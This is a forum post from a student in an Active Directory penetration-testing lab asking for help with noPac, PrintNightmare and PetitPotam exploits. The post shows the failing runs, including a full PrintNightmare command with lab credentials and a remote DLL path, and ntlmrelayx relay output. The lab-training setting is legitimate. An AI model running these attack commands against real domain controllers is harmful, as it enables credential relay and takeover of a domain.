Howdy everyone,
I have been trying for hours and hours to gain a shell on the DC01 host. I’ve tried all 3 exploits numerous times, and fail each time. Tried resetting the VM numerous times, and have done everything verbatim how it is presented in the module. Have also tried others suggestions on previous posts for this module, all to no avail. I think there may be a bug or something because I’ve tried everything I can think of.
For the noPac.py exploit, I am getting the following error:
[] Using TGT from cache
[] Impersonating administrator
[*] Requesting S4U2self
[-] [Errno 104] Connection reset by peer
[-] GetST error, error: [Errno 104] Connection reset by peer
And for the PrintNightmare exploit, I get the following error:
┌─[✗]─[root@ea-attack01]─[/opt/CVE-2021-1675]
└──╼ sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 ‘\172.16.5.225\CompData\backupscript.dll’
[*] Connecting to ncacn_np:172.16.5.5[\PIPE\spoolss]
[+] Bind OK
[-] Failed to enumerate remote pDriverPath
The NETBIOS connection with the remote host timed out.
And finally, for the PetitPotam.py exploit, I get the following error:
[-] Sending EfsRpcOpenFileRaw!
Something went wrong, check error status => The NETBIOS connection with the remote host timed out.
Traceback (most recent call last):
File “/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20211013.152215.3fe2d73a-py3.9.egg/impacket/nmb.py”, line 984, in non_polling_read
received = self._sock.recv(bytes_left)
ConnectionResetError: [Errno 104] Connection reset by peerDuring handling of the above exception, another exception occurred:
Traceback (most recent call last):
File “/opt/PetitPotam/PetitPotam.py”, line 461, in
main()
File “/opt/PetitPotam/PetitPotam.py”, line 457, in main
dce.disconnect()
File “/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20211013.152215.3fe2d73a-py3.9.egg/impacket/dcerpc/v5/rpcrt.py”, line 806, in disconnect-SNIP-
And additionally for PetitPotam, on the ntlmrelayx window, I get the following over and over again:
HTTP server returned error code 200, treating as a successful login
[] Authenticating against http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL as INLANEFREIGHT/ACADEMY-EA-DC01$ SUCCEED
[] Skipping user ACADEMY-EA-DC01$ since attack was already performed
[*] SMBD-Thread-4: Connection from INLANEFREIGHT/ACADEMY-EA-DC01$@172.16.5.5 controlled, attacking target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL
I am to the point of skipping this part of the module as I have seriously tried everything. At first I thought maybe I should be using the 10. IP of the attack host for exploits, but people mentioned in other posts for this that the local IP needs to be the 172.16.5.225 address. That part was extra confusing, as you will see both IP’s pop up when typing ifconfig.
Is anyone else having issue’s similar to this on this module? I really think that it might be bugged or something. As again, I am doing everything verbatim as its presented. And I have tried every single suggestion on all previous posts related to this module. Could it have something to do with the wrong impacket version being installed on the attack host? If so, there is no way to download the suggested Impacket version, as the attack host has no connection to the external internet. 